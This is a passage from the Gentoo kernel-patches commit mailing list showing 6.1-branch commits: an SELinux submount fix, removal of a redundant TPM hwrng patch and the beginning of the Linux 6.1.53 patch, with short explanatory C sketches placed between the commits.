++	$(if $(INSTALL_LIST),rsync -a --copy-unsafe-links $(INSTALL_LIST) $(INSTALL_PATH)/)
+ endef
+ 
+ define INSTALL_RULE


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-09-15 18:04 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-09-15 18:04 UTC (permalink / raw
  To: gentoo-commits

commit:     5df5f5fb4856b26077f84645a8c9ed2b8bae0edf
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Sep 15 18:04:22 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri Sep 15 18:04:22 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=5df5f5fb

selinux: fix handling of empty opts in selinux_fs_context_submount()

Bug: https://bugs.gentoo.org/914204

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                   |  4 +++
 1515_selinux-fix-handling-of-empty-opts.patch | 51 +++++++++++++++++++++++++++
 2 files changed, 55 insertions(+)

diff --git a/0000_README b/0000_README
index 053298cf..e0a65c77 100644
--- a/0000_README
+++ b/0000_README
@@ -263,6 +263,10 @@ Patch:  1510_fs-enable-link-security-restrictions-by-default.patch
 From:   http://sources.debian.net/src/linux/3.16.7-ckt4-3/debian/patches/debian/fs-enable-link-security-restrictions-by-default.patch/
 Desc:   Enable link security restrictions by default.
 
+Patch:  1515_selinux-fix-handling-of-empty-opts.patch
+From:   https://www.spinics.net/lists/linux-fsdevel/msg249428.html
+Desc:   selinux: fix handling of empty opts in selinux_fs_context_submount()
+
 Patch:  1700_sparc-address-warray-bound-warnings.patch
 From:		https://github.com/KSPP/linux/issues/109
 Desc:		Address -Warray-bounds warnings 

diff --git a/1515_selinux-fix-handling-of-empty-opts.patch b/1515_selinux-fix-handling-of-empty-opts.patch
new file mode 100644
index 00000000..10336ec5
--- /dev/null
+++ b/1515_selinux-fix-handling-of-empty-opts.patch
@@ -0,0 +1,51 @@
+selinux: fix handling of empty opts in selinux_fs_context_submount()
+
+selinux_set_mnt_opts() relies on the fact that the mount options pointer
+is always NULL when all options are unset (specifically in its
+!selinux_initialized() branch). However, the new
+selinux_fs_context_submount() hook breaks this rule by allocating a new
+structure even if no options are set. That causes any submount created
+before a SELinux policy is loaded to be rejected in
+selinux_set_mnt_opts().
+
+Fix this by making selinux_fs_context_submount() leave fc->security
+set to NULL when there are no options to be copied from the reference
+superblock.
+
+Reported-by: Adam Williamson <awilliam@xxxxxxxxxx>
+Link: https://bugzilla.redhat.com/show_bug.cgi?id=2236345
+Fixes: d80a8f1b58c2 ("vfs, security: Fix automount superblock LSM init problem, preventing NFS sb sharing")
+Signed-off-by: Ondrej Mosnacek <omosnace@xxxxxxxxxx>
+---
+ security/selinux/hooks.c | 10 ++++++++--
+ 1 file changed, 8 insertions(+), 2 deletions(-)
+
+diff --git a/security/selinux/hooks.c b/security/selinux/hooks.c
+index 10350534de6d6..2aa0e219d7217 100644
+--- a/security/selinux/hooks.c
++++ b/security/selinux/hooks.c
+@@ -2775,14 +2775,20 @@ static int selinux_umount(struct vfsmount *mnt, int flags)
+ static int selinux_fs_context_submount(struct fs_context *fc,
+ 				   struct super_block *reference)
+ {
+-	const struct superblock_security_struct *sbsec;
++	const struct superblock_security_struct *sbsec = selinux_superblock(reference);
+ 	struct selinux_mnt_opts *opts;
+ 
++	/*
++	 * Ensure that fc->security remains NULL when no options are set
++	 * as expected by selinux_set_mnt_opts().
++	 */
++	if (!(sbsec->flags & (FSCONTEXT_MNT|CONTEXT_MNT|DEFCONTEXT_MNT)))
++		return 0;
++
+ 	opts = kzalloc(sizeof(*opts), GFP_KERNEL);
+ 	if (!opts)
+ 		return -ENOMEM;
+ 
+-	sbsec = selinux_superblock(reference);
+ 	if (sbsec->flags & FSCONTEXT_MNT)
+ 		opts->fscontext_sid = sbsec->sid;
+ 	if (sbsec->flags & CONTEXT_MNT)
+-- 
+2.41.0
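The invariant the fix restores: fc->security must stay NULL whenever no mount options are set, so the allocation happens only after the flags test. Distilled to a standalone shape (types and flag values are placeholders, not the LSM API):

#include <errno.h>
#include <stdio.h>
#include <stdlib.h>

#define FSCONTEXT_MNT  0x1
#define CONTEXT_MNT    0x2
#define DEFCONTEXT_MNT 0x4

struct fs_context { void *security; };

static int submount(struct fs_context *fc, unsigned int flags)
{
	/* No options set: leave fc->security NULL, as later checks expect. */
	if (!(flags & (FSCONTEXT_MNT | CONTEXT_MNT | DEFCONTEXT_MNT)))
		return 0;

	fc->security = calloc(1, 64);
	return fc->security ? 0 : -ENOMEM;
}

int main(void)
{
	struct fs_context fc = { NULL };

	submount(&fc, 0);
	printf("security: %p\n", fc.security);
	return 0;
}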


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-09-13 11:19 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-09-13 11:19 UTC (permalink / raw
  To: gentoo-commits

commit:     71132679abcc54524dac8235d816499d3badd881
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Sep 13 11:19:11 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Sep 13 11:19:11 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=71132679

Remove redundant patch

Removed:
2930_tpm-Enable-hwrng-for-Pluton-on-AMD-CPUs.patch

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                        |  4 -
 2930_tpm-Enable-hwrng-for-Pluton-on-AMD-CPUs.patch | 90 ----------------------
 2 files changed, 94 deletions(-)

diff --git a/0000_README b/0000_README
index d7316905..053298cf 100644
--- a/0000_README
+++ b/0000_README
@@ -283,10 +283,6 @@ Patch:  2920_sign-file-patch-for-libressl.patch
 From:   https://bugs.gentoo.org/717166
 Desc:   sign-file: full functionality with modern LibreSSL
 
-Patch:  2930_tpm-Enable-hwrng-for-Pluton-on-AMD-CPUs.patch
-From:   https://lore.kernel.org/all/20230822231510.2263255-1-jarkko@kernel.org/
-Desc:   tpm: Enable hwrng only for Pluton on AMD CPUs
-
 Patch:  3000_Support-printing-firmware-info.patch
 From:   https://bugs.gentoo.org/732852
 Desc:   Print firmware info (Reqs CONFIG_GENTOO_PRINT_FIRMWARE_INFO). Thanks to Georgy Yakovlev

diff --git a/2930_tpm-Enable-hwrng-for-Pluton-on-AMD-CPUs.patch b/2930_tpm-Enable-hwrng-for-Pluton-on-AMD-CPUs.patch
deleted file mode 100644
index 932e82ed..00000000
--- a/2930_tpm-Enable-hwrng-for-Pluton-on-AMD-CPUs.patch
+++ /dev/null
@@ -1,90 +0,0 @@
-From: Jarkko Sakkinen <jarkko@kernel.org>
-To: linux-integrity@vger.kernel.org
-Cc: Jerry Snitselaar <jsnitsel@redhat.com>,
-	Jarkko Sakkinen <jarkko@kernel.org>,
-	stable@vger.kernel.org, Todd Brandt <todd.e.brandt@intel.com>,
-	Peter Huewe <peterhuewe@gmx.de>, Jason Gunthorpe <jgg@ziepe.ca>,
-	Mario Limonciello <mario.limonciello@amd.com>,
-	linux-kernel@vger.kernel.org
-Subject: [PATCH v3] tpm: Enable hwrng only for Pluton on AMD CPUs
-Date: Wed, 23 Aug 2023 02:15:10 +0300	[thread overview]
-Message-ID: <20230822231510.2263255-1-jarkko@kernel.org> (raw)
-
-The vendor check introduced by commit 554b841d4703 ("tpm: Disable RNG for
-all AMD fTPMs") doesn't work properly on a number of Intel fTPMs.  On the
-reported systems the TPM doesn't reply at bootup and returns back the
-command code. This makes the TPM fail probe.
-
-Since Microsoft Pluton is the only known combination of an AMD CPU and
-an fTPM from another vendor, disable hwrng otherwise. To make sysadmins
-aware of this, also print an info message to the klog.
-
-Cc: stable@vger.kernel.org
-Fixes: 554b841d4703 ("tpm: Disable RNG for all AMD fTPMs")
-Reported-by: Todd Brandt <todd.e.brandt@intel.com>
-Closes: https://bugzilla.kernel.org/show_bug.cgi?id=217804
-Signed-off-by: Jarkko Sakkinen <jarkko@kernel.org>
----
-v3:
-* Forgot to amend config flags.
-v2:
-* CONFIG_X86
-* Removed "Reviewed-by: Jarkko Sakkinen <jarkko@kernel.org>"
-* Removed "Signed-off-by: Mario Limonciello <mario.limonciello@amd.com>"
----
- drivers/char/tpm/tpm_crb.c | 33 ++++++++-------------------------
- 1 file changed, 8 insertions(+), 25 deletions(-)
-
-diff --git a/drivers/char/tpm/tpm_crb.c b/drivers/char/tpm/tpm_crb.c
-index 65ff4d2fbe8d..ea085b14ab7c 100644
---- a/drivers/char/tpm/tpm_crb.c
-+++ b/drivers/char/tpm/tpm_crb.c
-@@ -463,28 +463,6 @@ static bool crb_req_canceled(struct tpm_chip *chip, u8 status)
- 	return (cancel & CRB_CANCEL_INVOKE) == CRB_CANCEL_INVOKE;
- }
- 
--static int crb_check_flags(struct tpm_chip *chip)
--{
--	u32 val;
--	int ret;
--
--	ret = crb_request_locality(chip, 0);
--	if (ret)
--		return ret;
--
--	ret = tpm2_get_tpm_pt(chip, TPM2_PT_MANUFACTURER, &val, NULL);
--	if (ret)
--		goto release;
--
--	if (val == 0x414D4400U /* AMD */)
--		chip->flags |= TPM_CHIP_FLAG_HWRNG_DISABLED;
--
--release:
--	crb_relinquish_locality(chip, 0);
--
--	return ret;
--}
--
- static const struct tpm_class_ops tpm_crb = {
- 	.flags = TPM_OPS_AUTO_STARTUP,
- 	.status = crb_status,
-@@ -827,9 +805,14 @@ static int crb_acpi_add(struct acpi_device *device)
- 	if (rc)
- 		goto out;
- 
--	rc = crb_check_flags(chip);
--	if (rc)
--		goto out;
-+#ifdef CONFIG_X86
-+	/* A quirk for https://www.amd.com/en/support/kb/faq/pa-410 */
-+	if (boot_cpu_data.x86_vendor == X86_VENDOR_AMD &&
-+	    priv->sm != ACPI_TPM2_COMMAND_BUFFER_WITH_PLUTON) {
-+		dev_info(dev, "Disabling hwrng\n");
-+		chip->flags |= TPM_CHIP_FLAG_HWRNG_DISABLED;
-+	}
-+#endif /* CONFIG_X86 */
- 
- 	rc = tpm_chip_register(chip);
- 
--- 
-2.39.2
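
The patch removed above became redundant once the same fix landed upstream; its core change swaps a runtime TPM manufacturer query for a boot-time check on the CPU vendor and the ACPI start method. A hedged C sketch of the equivalent condition, using illustrative constant values rather than the kernel's real X86_VENDOR_AMD and ACPI start-method IDs:

#include <stdbool.h>
#include <stdio.h>

/* Illustrative constants; the kernel compares boot_cpu_data.x86_vendor
 * and the ACPI TPM2 start-method ID for a Pluton command buffer. */
enum { VENDOR_AMD = 2, VENDOR_INTEL = 0 };
enum { START_METHOD_CRB = 7, START_METHOD_CRB_PLUTON = 13 };

/* hwrng is kept only when an AMD CPU is paired with a Pluton fTPM. */
static bool hwrng_disabled(int cpu_vendor, int start_method)
{
	return cpu_vendor == VENDOR_AMD &&
	       start_method != START_METHOD_CRB_PLUTON;
}

int main(void)
{
	printf("AMD + plain CRB  -> disabled: %d\n",
	       hwrng_disabled(VENDOR_AMD, START_METHOD_CRB));
	printf("AMD + Pluton CRB -> disabled: %d\n",
	       hwrng_disabled(VENDOR_AMD, START_METHOD_CRB_PLUTON));
	printf("Intel            -> disabled: %d\n",
	       hwrng_disabled(VENDOR_INTEL, START_METHOD_CRB));
	return 0;
}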


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-09-13 11:05 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-09-13 11:05 UTC (permalink / raw
  To: gentoo-commits

commit:     0efe20bff15b0dcaa94fb25d6e40b0161e8201b3
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Sep 13 11:05:07 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Sep 13 11:05:07 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=0efe20bf

Linux patch 6.1.53

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |     4 +
 1052_linux-6.1.53.patch | 23057 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 23061 insertions(+)

diff --git a/0000_README b/0000_README
index 9d50d635..d7316905 100644
--- a/0000_README
+++ b/0000_README
@@ -251,6 +251,10 @@ Patch:  1051_linux-6.1.52.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.52
 
+Patch:  1052_linux-6.1.53.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.53
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1052_linux-6.1.53.patch b/1052_linux-6.1.53.patch
new file mode 100644
index 00000000..29b394b8
--- /dev/null
+++ b/1052_linux-6.1.53.patch
@@ -0,0 +1,23057 @@
+diff --git a/Documentation/ABI/testing/sysfs-bus-fsi-devices-sbefifo b/Documentation/ABI/testing/sysfs-bus-fsi-devices-sbefifo
+index 531fe9d6b40aa..c7393b4dd2d88 100644
+--- a/Documentation/ABI/testing/sysfs-bus-fsi-devices-sbefifo
++++ b/Documentation/ABI/testing/sysfs-bus-fsi-devices-sbefifo
+@@ -5,6 +5,6 @@ Description:
+ 		Indicates whether or not this SBE device has experienced a
+ 		timeout; i.e. the SBE did not respond within the time allotted
+ 		by the driver. A value of 1 indicates that a timeout has
+-		ocurred and no transfers have completed since the timeout. A
+-		value of 0 indicates that no timeout has ocurred, or if one
+-		has, more recent transfers have completed successful.
++		occurred and no transfers have completed since the timeout. A
++		value of 0 indicates that no timeout has occurred, or if one
++		has, more recent transfers have completed successfully.
+diff --git a/Documentation/ABI/testing/sysfs-driver-chromeos-acpi b/Documentation/ABI/testing/sysfs-driver-chromeos-acpi
+index c308926e1568a..7c8e129fc1005 100644
+--- a/Documentation/ABI/testing/sysfs-driver-chromeos-acpi
++++ b/Documentation/ABI/testing/sysfs-driver-chromeos-acpi
+@@ -134,4 +134,4 @@ KernelVersion:	5.19
+ Description:
+ 		Returns the verified boot data block shared between the
+ 		firmware verification step and the kernel verification step
+-		(binary).
++		(hex dump).
+diff --git a/Documentation/devicetree/bindings/extcon/maxim,max77843.yaml b/Documentation/devicetree/bindings/extcon/maxim,max77843.yaml
+index 1289605456408..55800fb0221d0 100644
+--- a/Documentation/devicetree/bindings/extcon/maxim,max77843.yaml
++++ b/Documentation/devicetree/bindings/extcon/maxim,max77843.yaml
+@@ -23,6 +23,7 @@ properties:
+ 
+   connector:
+     $ref: /schemas/connector/usb-connector.yaml#
++    unevaluatedProperties: false
+ 
+   ports:
+     $ref: /schemas/graph.yaml#/properties/ports
+diff --git a/Documentation/scsi/scsi_mid_low_api.rst b/Documentation/scsi/scsi_mid_low_api.rst
+index a8c5bd15a4400..edfd179b9c7cc 100644
+--- a/Documentation/scsi/scsi_mid_low_api.rst
++++ b/Documentation/scsi/scsi_mid_low_api.rst
+@@ -1190,11 +1190,11 @@ Members of interest:
+ 		 - pointer to scsi_device object that this command is
+                    associated with.
+     resid
+-		 - an LLD should set this signed integer to the requested
++		 - an LLD should set this unsigned integer to the requested
+                    transfer length (i.e. 'request_bufflen') less the number
+                    of bytes that are actually transferred. 'resid' is
+                    preset to 0 so an LLD can ignore it if it cannot detect
+-                   underruns (overruns should be rare). If possible an LLD
++                   underruns (overruns should not be reported). An LLD
+                    should set 'resid' prior to invoking 'done'. The most
+                    interesting case is data transfers from a SCSI target
+                    device (e.g. READs) that underrun.
+diff --git a/Documentation/userspace-api/media/v4l/ext-ctrls-codec-stateless.rst b/Documentation/userspace-api/media/v4l/ext-ctrls-codec-stateless.rst
+index cd33857d947d3..0ef49647c90bd 100644
+--- a/Documentation/userspace-api/media/v4l/ext-ctrls-codec-stateless.rst
++++ b/Documentation/userspace-api/media/v4l/ext-ctrls-codec-stateless.rst
+@@ -2923,6 +2923,13 @@ This structure contains all loop filter related parameters. See sections
+       - ``poc_lt_curr[V4L2_HEVC_DPB_ENTRIES_NUM_MAX]``
+       - PocLtCurr as described in section 8.3.2 "Decoding process for reference
+         picture set": provides the index of the long term references in DPB array.
++    * - __u8
++      - ``num_delta_pocs_of_ref_rps_idx``
++      - When the short_term_ref_pic_set_sps_flag in the slice header is equal to 0,
++        it is the same as the derived value NumDeltaPocs[RefRpsIdx]. It can be used to parse
++        the RPS data in slice headers instead of skipping it with @short_term_ref_pic_set_size.
++        When the value of short_term_ref_pic_set_sps_flag in the slice header is
++        equal to 1, num_delta_pocs_of_ref_rps_idx shall be set to 0.
+     * - struct :c:type:`v4l2_hevc_dpb_entry`
+       - ``dpb[V4L2_HEVC_DPB_ENTRIES_NUM_MAX]``
+       - The decoded picture buffer, for meta-data about reference frames.
+diff --git a/Makefile b/Makefile
+index 82aaa3ae7395b..35fc0d62898dc 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 52
++SUBLEVEL = 53
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+@@ -1291,7 +1291,7 @@ prepare0: archprepare
+ # All the preparing..
+ prepare: prepare0
+ ifdef CONFIG_RUST
+-	$(Q)$(CONFIG_SHELL) $(srctree)/scripts/rust_is_available.sh -v
++	$(Q)$(CONFIG_SHELL) $(srctree)/scripts/rust_is_available.sh
+ 	$(Q)$(MAKE) $(build)=rust
+ endif
+ 
+@@ -1817,7 +1817,7 @@ $(DOC_TARGETS):
+ # "Is Rust available?" target
+ PHONY += rustavailable
+ rustavailable:
+-	$(Q)$(CONFIG_SHELL) $(srctree)/scripts/rust_is_available.sh -v && echo "Rust is available!"
++	$(Q)$(CONFIG_SHELL) $(srctree)/scripts/rust_is_available.sh && echo "Rust is available!"
+ 
+ # Documentation target
+ #
+diff --git a/arch/arm/boot/dts/Makefile b/arch/arm/boot/dts/Makefile
+index 6aa7dc4db2fc8..df6d905eeb877 100644
+--- a/arch/arm/boot/dts/Makefile
++++ b/arch/arm/boot/dts/Makefile
+@@ -331,6 +331,7 @@ dtb-$(CONFIG_MACH_KIRKWOOD) += \
+ 	kirkwood-iconnect.dtb \
+ 	kirkwood-iomega_ix2_200.dtb \
+ 	kirkwood-is2.dtb \
++	kirkwood-km_fixedeth.dtb \
+ 	kirkwood-km_kirkwood.dtb \
+ 	kirkwood-l-50.dtb \
+ 	kirkwood-laplug.dtb \
+@@ -861,7 +862,10 @@ dtb-$(CONFIG_ARCH_OMAP3) += \
+ 	am3517-craneboard.dtb \
+ 	am3517-evm.dtb \
+ 	am3517_mt_ventoux.dtb \
++	logicpd-torpedo-35xx-devkit.dtb \
+ 	logicpd-torpedo-37xx-devkit.dtb \
++	logicpd-torpedo-37xx-devkit-28.dtb \
++	logicpd-som-lv-35xx-devkit.dtb \
+ 	logicpd-som-lv-37xx-devkit.dtb \
+ 	omap3430-sdp.dtb \
+ 	omap3-beagle.dtb \
+@@ -1527,6 +1531,8 @@ dtb-$(CONFIG_MACH_ARMADA_38X) += \
+ 	armada-388-helios4.dtb \
+ 	armada-388-rd.dtb
+ dtb-$(CONFIG_MACH_ARMADA_39X) += \
++	armada-390-db.dtb \
++	armada-395-gp.dtb \
+ 	armada-398-db.dtb
+ dtb-$(CONFIG_MACH_ARMADA_XP) += \
+ 	armada-xp-axpwifiap.dtb \
+@@ -1556,6 +1562,7 @@ dtb-$(CONFIG_MACH_DOVE) += \
+ dtb-$(CONFIG_ARCH_MEDIATEK) += \
+ 	mt2701-evb.dtb \
+ 	mt6580-evbp1.dtb \
++	mt6582-prestigio-pmt5008-3g.dtb \
+ 	mt6589-aquaris5.dtb \
+ 	mt6589-fairphone-fp1.dtb \
+ 	mt6592-evb.dtb \
+@@ -1608,6 +1615,7 @@ dtb-$(CONFIG_ARCH_ASPEED) += \
+ 	aspeed-bmc-intel-s2600wf.dtb \
+ 	aspeed-bmc-inspur-fp5280g2.dtb \
+ 	aspeed-bmc-inspur-nf5280m6.dtb \
++	aspeed-bmc-inspur-on5263m5.dtb \
+ 	aspeed-bmc-lenovo-hr630.dtb \
+ 	aspeed-bmc-lenovo-hr855xg2.dtb \
+ 	aspeed-bmc-microsoft-olympus.dtb \
+diff --git a/arch/arm/boot/dts/bcm47189-luxul-xap-1440.dts b/arch/arm/boot/dts/bcm47189-luxul-xap-1440.dts
+index e20b6d2eb274a..1e23e0a807819 100644
+--- a/arch/arm/boot/dts/bcm47189-luxul-xap-1440.dts
++++ b/arch/arm/boot/dts/bcm47189-luxul-xap-1440.dts
+@@ -46,3 +46,16 @@
+ 		};
+ 	};
+ };
++
++&gmac0 {
++	phy-mode = "rgmii";
++	phy-handle = <&bcm54210e>;
++
++	mdio {
++		/delete-node/ switch@1e;
++
++		bcm54210e: ethernet-phy@0 {
++			reg = <0>;
++		};
++	};
++};
+diff --git a/arch/arm/boot/dts/bcm47189-luxul-xap-810.dts b/arch/arm/boot/dts/bcm47189-luxul-xap-810.dts
+index 9d863570fcf3a..5dbb950c8113e 100644
+--- a/arch/arm/boot/dts/bcm47189-luxul-xap-810.dts
++++ b/arch/arm/boot/dts/bcm47189-luxul-xap-810.dts
+@@ -83,3 +83,16 @@
+ 		};
+ 	};
+ };
++
++&gmac0 {
++	phy-mode = "rgmii";
++	phy-handle = <&bcm54210e>;
++
++	mdio {
++		/delete-node/ switch@1e;
++
++		bcm54210e: ethernet-phy@0 {
++			reg = <0>;
++		};
++	};
++};
+diff --git a/arch/arm/boot/dts/bcm47189-tenda-ac9.dts b/arch/arm/boot/dts/bcm47189-tenda-ac9.dts
+index 55b92645b0f1f..b7c7bf0be76f4 100644
+--- a/arch/arm/boot/dts/bcm47189-tenda-ac9.dts
++++ b/arch/arm/boot/dts/bcm47189-tenda-ac9.dts
+@@ -135,8 +135,8 @@
+ 			label = "lan4";
+ 		};
+ 
+-		port@5 {
+-			reg = <5>;
++		port@8 {
++			reg = <8>;
+ 			label = "cpu";
+ 			ethernet = <&gmac0>;
+ 		};
+diff --git a/arch/arm/boot/dts/bcm53573.dtsi b/arch/arm/boot/dts/bcm53573.dtsi
+index 3f03a381db0f2..eed1a6147f0bf 100644
+--- a/arch/arm/boot/dts/bcm53573.dtsi
++++ b/arch/arm/boot/dts/bcm53573.dtsi
+@@ -127,6 +127,9 @@
+ 
+ 		pcie0: pcie@2000 {
+ 			reg = <0x00002000 0x1000>;
++
++			#address-cells = <3>;
++			#size-cells = <2>;
+ 		};
+ 
+ 		usb2: usb2@4000 {
+@@ -156,8 +159,6 @@
+ 			};
+ 
+ 			ohci: usb@d000 {
+-				#usb-cells = <0>;
+-
+ 				compatible = "generic-ohci";
+ 				reg = <0xd000 0x1000>;
+ 				interrupt-parent = <&gic>;
+diff --git a/arch/arm/boot/dts/bcm947189acdbmr.dts b/arch/arm/boot/dts/bcm947189acdbmr.dts
+index 16e70a264faf5..458bb6e2f5728 100644
+--- a/arch/arm/boot/dts/bcm947189acdbmr.dts
++++ b/arch/arm/boot/dts/bcm947189acdbmr.dts
+@@ -60,9 +60,9 @@
+ 	spi {
+ 		compatible = "spi-gpio";
+ 		num-chipselects = <1>;
+-		gpio-sck = <&chipcommon 21 0>;
+-		gpio-miso = <&chipcommon 22 0>;
+-		gpio-mosi = <&chipcommon 23 0>;
++		sck-gpios = <&chipcommon 21 0>;
++		miso-gpios = <&chipcommon 22 0>;
++		mosi-gpios = <&chipcommon 23 0>;
+ 		cs-gpios = <&chipcommon 24 0>;
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+diff --git a/arch/arm/boot/dts/imx7s.dtsi b/arch/arm/boot/dts/imx7s.dtsi
+index 11b9321badc51..667568aa4326a 100644
+--- a/arch/arm/boot/dts/imx7s.dtsi
++++ b/arch/arm/boot/dts/imx7s.dtsi
+@@ -1184,6 +1184,8 @@
+ 					<&clks IMX7D_USDHC1_ROOT_CLK>;
+ 				clock-names = "ipg", "ahb", "per";
+ 				bus-width = <4>;
++				fsl,tuning-step = <2>;
++				fsl,tuning-start-tap = <20>;
+ 				status = "disabled";
+ 			};
+ 
+@@ -1196,6 +1198,8 @@
+ 					<&clks IMX7D_USDHC2_ROOT_CLK>;
+ 				clock-names = "ipg", "ahb", "per";
+ 				bus-width = <4>;
++				fsl,tuning-step = <2>;
++				fsl,tuning-start-tap = <20>;
+ 				status = "disabled";
+ 			};
+ 
+@@ -1208,6 +1212,8 @@
+ 					<&clks IMX7D_USDHC3_ROOT_CLK>;
+ 				clock-names = "ipg", "ahb", "per";
+ 				bus-width = <4>;
++				fsl,tuning-step = <2>;
++				fsl,tuning-start-tap = <20>;
+ 				status = "disabled";
+ 			};
+ 
+diff --git a/arch/arm/boot/dts/qcom-ipq4019.dtsi b/arch/arm/boot/dts/qcom-ipq4019.dtsi
+index 02e13d8c222a0..b5e0ed4923b59 100644
+--- a/arch/arm/boot/dts/qcom-ipq4019.dtsi
++++ b/arch/arm/boot/dts/qcom-ipq4019.dtsi
+@@ -228,9 +228,12 @@
+ 			interrupts = <GIC_SPI 123 IRQ_TYPE_LEVEL_HIGH>, <GIC_SPI 138 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "hc_irq", "pwr_irq";
+ 			bus-width = <8>;
+-			clocks = <&gcc GCC_SDCC1_AHB_CLK>, <&gcc GCC_SDCC1_APPS_CLK>,
+-				 <&gcc GCC_DCD_XO_CLK>;
+-			clock-names = "iface", "core", "xo";
++			clocks = <&gcc GCC_SDCC1_AHB_CLK>,
++				 <&gcc GCC_SDCC1_APPS_CLK>,
++				 <&xo>;
++			clock-names = "iface",
++				      "core",
++				      "xo";
+ 			status = "disabled";
+ 		};
+ 
+diff --git a/arch/arm/boot/dts/s3c6410-mini6410.dts b/arch/arm/boot/dts/s3c6410-mini6410.dts
+index 17097da36f5ed..0b07b3c319604 100644
+--- a/arch/arm/boot/dts/s3c6410-mini6410.dts
++++ b/arch/arm/boot/dts/s3c6410-mini6410.dts
+@@ -51,7 +51,7 @@
+ 
+ 		ethernet@18000000 {
+ 			compatible = "davicom,dm9000";
+-			reg = <0x18000000 0x2 0x18000004 0x2>;
++			reg = <0x18000000 0x2>, <0x18000004 0x2>;
+ 			interrupt-parent = <&gpn>;
+ 			interrupts = <7 IRQ_TYPE_LEVEL_HIGH>;
+ 			davicom,no-eeprom;
+diff --git a/arch/arm/boot/dts/s5pv210-smdkv210.dts b/arch/arm/boot/dts/s5pv210-smdkv210.dts
+index fbae768d65e27..901e7197b1368 100644
+--- a/arch/arm/boot/dts/s5pv210-smdkv210.dts
++++ b/arch/arm/boot/dts/s5pv210-smdkv210.dts
+@@ -41,7 +41,7 @@
+ 
+ 	ethernet@a8000000 {
+ 		compatible = "davicom,dm9000";
+-		reg = <0xA8000000 0x2 0xA8000002 0x2>;
++		reg = <0xa8000000 0x2>, <0xa8000002 0x2>;
+ 		interrupt-parent = <&gph1>;
+ 		interrupts = <1 IRQ_TYPE_LEVEL_HIGH>;
+ 		local-mac-address = [00 00 de ad be ef];
+@@ -55,6 +55,14 @@
+ 		default-brightness-level = <6>;
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pwm3_out>;
++		power-supply = <&dc5v_reg>;
++	};
++
++	dc5v_reg: regulator-0 {
++		compatible = "regulator-fixed";
++		regulator-name = "DC5V";
++		regulator-min-microvolt = <5000000>;
++		regulator-max-microvolt = <5000000>;
+ 	};
+ };
+ 
+diff --git a/arch/arm/boot/dts/stm32mp157c-emstamp-argon.dtsi b/arch/arm/boot/dts/stm32mp157c-emstamp-argon.dtsi
+index d540550f7da26..fd89542c69c93 100644
+--- a/arch/arm/boot/dts/stm32mp157c-emstamp-argon.dtsi
++++ b/arch/arm/boot/dts/stm32mp157c-emstamp-argon.dtsi
+@@ -68,11 +68,6 @@
+ 			reg = <0x38000000 0x10000>;
+ 			no-map;
+ 		};
+-
+-		gpu_reserved: gpu@dc000000 {
+-			reg = <0xdc000000 0x4000000>;
+-			no-map;
+-		};
+ 	};
+ 
+ 	led: gpio_leds {
+@@ -102,9 +97,11 @@
+ 	adc1: adc@0 {
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&adc1_in6_pins_a>;
+-		st,min-sample-time-nsecs = <5000>;
+-		st,adc-channels = <6>;
+ 		status = "disabled";
++		channel@6 {
++			reg = <6>;
++			st,min-sample-time-ns = <5000>;
++		};
+ 	};
+ 
+ 	adc2: adc@100 {
+@@ -173,7 +170,7 @@
+ 	phy-handle = <&phy0>;
+ 	st,eth-ref-clk-sel;
+ 
+-	mdio0 {
++	mdio {
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+ 		compatible = "snps,dwmac-mdio";
+@@ -183,10 +180,6 @@
+ 	};
+ };
+ 
+-&gpu {
+-	contiguous-area = <&gpu_reserved>;
+-};
+-
+ &hash1 {
+ 	status = "okay";
+ };
+@@ -375,8 +368,8 @@
+ &m4_rproc {
+ 	memory-region = <&retram>, <&mcuram>, <&mcuram2>, <&vdev0vring0>,
+ 			<&vdev0vring1>, <&vdev0buffer>;
+-	mboxes = <&ipcc 0>, <&ipcc 1>, <&ipcc 2>;
+-	mbox-names = "vq0", "vq1", "shutdown";
++	mboxes = <&ipcc 0>, <&ipcc 1>, <&ipcc 2>, <&ipcc 3>;
++	mbox-names = "vq0", "vq1", "shutdown", "detach";
+ 	interrupt-parent = <&exti>;
+ 	interrupts = <68 1>;
+ 	interrupt-names = "wdg";
+diff --git a/arch/arm/boot/dts/stm32mp157c-ev1.dts b/arch/arm/boot/dts/stm32mp157c-ev1.dts
+index 050c3c27a4203..b72d5e8aa4669 100644
